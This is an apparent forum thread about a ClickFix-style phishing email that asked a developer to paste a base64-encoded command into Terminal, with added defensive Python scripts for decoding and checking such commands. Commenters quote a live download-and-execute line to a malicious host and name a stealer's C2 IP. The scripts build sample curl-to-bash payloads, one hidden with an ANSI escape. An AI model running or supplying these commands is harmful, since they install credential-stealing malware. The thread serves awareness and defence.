Why would you ask ChatGPT to tell you what a base64-encoded string is? Just base64 decode it! This blog post's "investigation" is worthless when it's just copy/pasting what a chat bot said. There is no reason to rely on a chat bot for this.
nerdsniper
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. It provides a reverse-shell via http://83.219.248.194 and exfiltrates files with the following extensions: txt rtf doc docx xls xlsx key wallet jpg dat pdf pem asc ppk rdp sql ovpn kdbx conf json It looks quite similar to AMOS - Atomic MacOS Stealer.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
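The single-byte XOR obfuscation nerdsniper describes is cheap to undo, because the key space is only 256 values. What follows is an added example, not the thread's code and not the sample's, of how an analyst would brute-force such a key to recover an embedded dotted-quad from a blob. The blob, the key 0x5A and the address 198.51.100.7 (a documentation-range IP) are constructed for the example; nothing in it is taken from the malware discussed above.

```python
# Added example (not from the thread or from the sample it discusses): recover a
# single-byte-XOR-obfuscated IPv4 string from a blob by trying all 256 keys.
import re
from typing import List, Tuple

# Dotted quad; the octet range is checked separately because the regex cannot.
IPV4_RE = re.compile(rb"(?:\d{1,3}\.){3}\d{1,3}")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the single-byte key (0..255)."""
    return bytes(b ^ key for b in data)


def find_xored_ipv4(blob: bytes) -> List[Tuple[int, int, str]]:
    """Try every single-byte XOR key over blob and return (key, offset, ip)
    for each decoded window that is a well-formed IPv4 address.
    Key 0 is included, so addresses stored in the clear are reported too."""
    hits = []
    for key in range(256):
        plain = xor_bytes(blob, key)
        for m in IPV4_RE.finditer(plain):
            if all(int(octet) <= 255 for octet in m.group().split(b".")):
                hits.append((key, m.start(), m.group().decode("ascii")))
    return hits


# Constructed sample: some filler bytes, then a documentation-range address
# XOR-encoded with the hypothetical key 0x5A, then more filler. Neither the key
# nor the address comes from the malware in the thread.
SAMPLE_KEY = 0x5A
SAMPLE_IP = b"198.51.100.7"
SAMPLE_BLOB = b"\x00\x01\x02junk" + xor_bytes(SAMPLE_IP, SAMPLE_KEY) + b"\xff\xfe"

if __name__ == "__main__":
    for key, offset, ip in find_xored_ipv4(SAMPLE_BLOB):
        print(f"key=0x{key:02x} offset={offset} ip={ip}")
```

On a real binary you would feed the whole file (or the section the XOR loop reads from) in as the blob and expect a handful of false positives from random bytes that happen to decode to digit-dot runs; a second filter, such as requiring a port, a URL scheme or a NUL terminator next to the hit, prunes them. The same loop with a longer repeating key is the next step when 256 keys yield nothing.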
hinkley
To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
xg15
I think the first red flag for me would be that the user's reply completely mismatched with what OP wanted to know.
> Can you tell me which Url, your OS, and browser?
> Kind regards,
> Takuya

> Hey,
> Thanks for your previous guidance.
> I'm still having trouble with access using the latest version of Firefox on Windows
> It's difficult to describe the problem so I've included a screenshot. [...]
Lots of users will ignore requests, but I think very few will make up requests that never happened. OP was asking for information, yet the user makes it sound as if OP had requested him to update the browser. That already makes it sound a lot as if the reply was prewritten and not an actual conversation.
Of course it's not foolproof and a phisher with more resources could have generated the reply dynamically.
frenchtoast8
I'm seeing a lot more of these phishing links relying on sites.google.com. Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
zenmac
Also this git repo[1], which pretends to be an open-source macOS alarm clock, does the same trick. There is no code in the git repo, but if you click the "Get Awaken" red button, it has a base64-encoded string which translates to:

https://buildnetcrew.com/curl/e16f01ec9c3f30bc1c4cf56a7109be...' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch

The certificate is self-signed. Haven't looked into it much; in today's `curl bashscript` way of installing programs, this exposes another door for attackers to target non-tech-savvy users.

[1]: https://github.com/Awaken-Mac/Awaken
> ChatGPT confirmed

Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
ggm
Remember, the macOS "brew" webpage has a nice helpful "copy to clipboard" of the modern equivalent of "run this SHAR file". We've been trained to respect the HTTPS:// label, and then copy-paste-run.
userbinator
> Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that
What I would do in this situation: check to make sure that my site hasn't been hacked, then tell the "user" it's not a problem on my end.
The class names in the source code of the phishing site are... interesting. I've seen this in spam email headers too, and wonder what its purpose is; random alphanumerics are more common and "normal" than random words or word-like phrases. Before anyone suggests it has anything to do with AI, I doubt so as I've noticed its occurrence long before AI.
epaga
I’ve always wondered why spam and scam emails have been so…dumb and obvious… 99.9% of the time.
It does seem like AI may change this and if even the tech savvier ones among us are able to be duped, then I’m getting worried for people like my parents or less tech savvy friends… we may be in for a scammy next few years.
> Phishing emails disguised as support inquiries are getting more sophisticated, too. They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
blackjackfoe
I run a small, extremely niche fan site with under 500 users, and I received a very similar email the other day - someone complaining about the "cookie popup" (which my site doesn't have), and then sending me a "screenshot" in a sites.google.com link when I told them I don't know what they're talking about.
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
Sweepi
Don't know why a basic phishing attempt w/o any deep analysis and a clickbait title gets 200+ points.
freitasm
This is similar to compromised sites showing a fake Cloudflare "Prove you are human by running a command on your computer" dialog.
Just a different way of spreading the malware.
James_K
> as ChatGPT confirmed when I asked it to analyze it:
When I design my phishing links, I'll try to embed instructions for chatbots to suggest they're safe.
singpolyma3
There's nothing here to indicate AI-powered spam. It's a totally routine kind of phishing.
> as ChatGPT confirmed when I asked it to analyze it
Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targeted and wouldn't really trust it with any data.
lpellis
Pretty clever to host the malware on a sites.google.com domain, makes it look way more trustworthy.
Google should probably stop allowing people to add content under that address.
vivzkestrel
What if we had an online/offline Chrome running inside some VM / container that would directly open any links from email every time you clicked on a link inside an email?
This is tame and not scary compared to the kinds of real live human social engineering scams I’ve seen especially targeting senior leaders. With those scams there’s a budget for real human scammers.
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d immediately be scared away by the command line aspect of it.
root_axis
> My app’s website doesn’t even show a cookie consent dialog, I don’t track or serve ads, so there’s no need for that.
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
serf
It doesn't feel that scary to me -- it essentially took 5 mistakes to hit the payload. That's a pretty wide berth as far as phishing attacks go.
netsharc
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!".
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
jmholla
My standard procedure for copying and pasting commands from a website is to first run it through `hd` to make sure there's no fuckery with Unicode or escape sequences:
xclip -selection clipboard -o | hd
From the developer's post, I copied and pasted up to the execution and it was very obvious what the fuckery was, as the author found out (xpaste is my paste-to-stdout alias):

> the attacks are getting smarter.

An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
lynx97
Wait...
> echo -n Y3VybCAtc0w... | base64 -d | bash
...
> executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without hurting yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: just remove the " | bash" and you will easily see what the attacker tried to make you execute.
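Several comments in this thread (this one, and the earlier ones asking why ChatGPT was needed at all) make the same point: decode the stage, do not run it. The following is an added example, not code from the post or from anyone in the thread: a script that recognises the `echo -n <blob> | base64 -d | bash` shape, decodes the blob without executing anything, and reports what the decoded stage would do. The pattern names, the helper that rebuilds a one-liner for the sample, the host 203.0.113.9 (documentation range) and both sample stages are constructed for the example; the second sample mirrors the `-o /tmp/... && chmod +x ... && run` shape from the Awaken comment above.

```python
# Added example (not from the post or the thread): decode the base64 stage of a
# paste-this-into-Terminal one-liner without running it, then describe it.
import base64
import binascii
import re
from typing import Dict, List, Optional

# Matches `echo -n <blob> | base64 -d` (also `echo '<blob>' | base64 --decode`).
ONE_LINER_RE = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b"
)

# What decoded stages commonly do. Names are constructed labels for the report.
DANGER_PATTERNS = {
    "fetches remote content": re.compile(r"\b(?:curl|wget)\b"),
    "pipes the download into a shell": re.compile(r"\|\s*(?:ba|z|da)?sh\b"),
    # chmod +x <path> ... <path>  : drop a file and run it (backreference = same path)
    "drops a file and executes it": re.compile(r"chmod\s+\+x\s+(\S+).*\1"),
    "talks to a raw IP address": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
}


def decode_stage(one_liner: str) -> Optional[str]:
    """Return the decoded base64 stage of one_liner, or None if the text does
    not have the echo|base64 shape or the blob is not valid base64."""
    m = ONE_LINER_RE.search(one_liner)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def assess(one_liner: str) -> Dict[str, object]:
    """Decode the stage and list the danger patterns it triggers.
    Nothing here executes the command; it is only read."""
    stage = decode_stage(one_liner)
    if stage is None:
        return {"decoded": None, "findings": ["no decodable base64 stage found"]}
    findings: List[str] = [name for name, rx in DANGER_PATTERNS.items() if rx.search(stage)]
    return {"decoded": stage, "findings": findings}


def wrap_like_phishing_page(stage: str) -> str:
    """Wrap stage the way the phishing page does, yielding the one-liner a
    victim would paste. Used here only to build known-good samples."""
    blob = base64.b64encode(stage.encode()).decode("ascii")
    return f"echo -n {blob} | base64 -d | bash"


# Constructed samples (hypothetical host in the documentation range).
SAMPLE_STAGE = "curl -sL http://203.0.113.9/verify.sh | bash"
SAMPLE_ONE_LINER = wrap_like_phishing_page(SAMPLE_STAGE)

if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ONE_LINER
    report = assess(text)
    print("decoded:", report["decoded"])
    for finding in report["findings"]:
        print(" -", finding)
```

Feed it the clipboard (`pbpaste | python3 decode_stage.py`, or `xclip -selection clipboard -o | python3 decode_stage.py`) instead of a terminal. The decoded stage is usually only the first hop; to see the script it fetches, download it with `curl -o` to a file and read it, never with `| bash`.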
cmurf
Which is why it's infuriating that health care companies implement secure email by asking the customer to click on a 3rd party link in an email.
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
tantalor
> as ChatGPT confirmed when I asked it to analyze it
lol we are so cooked
juped
I hope everyone who posts a variation of "someone really fell for phishing? how stupid, I would never fall for phishing" falls for phishing soon.
gokayburuc-dev
As artificial intelligence has evolved, so have hacking techniques. Attacks using techniques like deepfakes and phishing have become increasingly prevalent. Multi-layered attacks began to be created. While they impersonate companies in the first layer, they bypass security systems (2FA etc.) in the second layer.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
wvbdmp
In Windows CMD you don’t even need to hit return at the end. They can just add a line break to the copied text and as soon as you paste into the command line (just a right click!), you own yourself.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
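wvbdmp's point about a pasted line break executing immediately and jmholla's `hd` habit call for the same check: look at what is actually in the clipboard before it reaches a shell. The following is an added example, not from the thread: a Python function that scans pasted text and reports embedded newlines and carriage returns, ANSI escape sequences, invisible or direction-changing Unicode, and any other non-ASCII. The sample strings and the host 203.0.113.9 (documentation range) are constructed for the example.

```python
# Added example (not from the thread): report the things a copy-paste-run
# attack can hide in clipboard text before that text reaches a terminal.
import unicodedata
from typing import List

ESC = "\x1b"


def check_paste(text: str) -> List[str]:
    """Return human-readable findings for text; an empty list means the text is
    printable ASCII with no line breaks, i.e. what a one-line command should be."""
    findings: List[str] = []
    i = 0
    while i < len(text):
        ch = text[i]
        cp = ord(ch)
        name = unicodedata.name(ch, "<unnamed>")
        if ch == "\n":
            findings.append(f"newline at offset {i}: the shell would run everything before it as soon as it is pasted")
        elif ch == "\r":
            findings.append(f"carriage return (CR) at offset {i}: acts like Enter in some terminals and can overwrite the displayed line")
        elif ch == ESC:
            # Consume one CSI sequence (ESC [ params final-byte) so it is reported once.
            j = i + 1
            if j < len(text) and text[j] == "[":
                j += 1
                while j < len(text) and not (0x40 <= ord(text[j]) <= 0x7E):
                    j += 1
                j = min(j + 1, len(text))
            findings.append(f"ANSI escape sequence at offset {i}: {text[i:j]!r} can hide or rewrite what the terminal shows")
            i = j
            continue
        elif cp < 0x20 or cp == 0x7F:
            if ch != "\t":
                findings.append(f"control character U+{cp:04X} at offset {i}")
        elif cp > 0x7E:
            if unicodedata.category(ch) == "Cf":
                findings.append(f"invisible/format character U+{cp:04X} {name} at offset {i}: can hide text or reverse its display order")
            else:
                findings.append(f"non-ASCII character U+{cp:04X} {name} at offset {i}: check for homoglyphs")
        i += 1
    return findings


def safe_to_paste(text: str) -> bool:
    """True only when check_paste finds nothing."""
    return not check_paste(text)


# Constructed samples of the tricks discussed in the thread.
SAMPLES = {
    "plain": "ls -la",
    "auto-run": "ls -la\n",
    "ansi-hidden": "whoami" + ESC + "[8m; curl -sL http://203.0.113.9/x.sh | bash" + ESC + "[0m",
    "zero-width": "ls\u200b -la",
    "bidi": "ls \u202e-la",
}

if __name__ == "__main__":
    import sys
    if sys.stdin.isatty():
        for label, sample in SAMPLES.items():
            print(label, "->", check_paste(sample) or "clean")
    else:
        for finding in check_paste(sys.stdin.read()):
            print(finding)
```

Run it on the clipboard rather than on a terminal: `pbpaste | python3 check_paste.py` on macOS, `xclip -selection clipboard -o | python3 check_paste.py` on X11. The "conceal" escape (`ESC[8m`) in the sample is the reason a visual check is not enough: the terminal renders the hidden part as nothing, but the shell still receives it.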
I got one of these too, ostensibly from Cloudflare: https://imgur.com/a/FZM22Lg
This is what it put in my clipboard for me to paste:
> It looked like a Google Drive link
No it didn't. It starts with "sites.google.com"
The website hosting the malware is... an Indian hose supplier? https://www.amanagencies.com/
Seems like a real company too, e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
Cloudflare trains users to click on that sort of thing with their wretched Turnstile NotCaptcha. Trained users may also click on:
https://www.securityweek.com/clickfix-attack-exploits-fake-c...
Similar MO https://iboostup.com/blog/ai-fake-repositories-github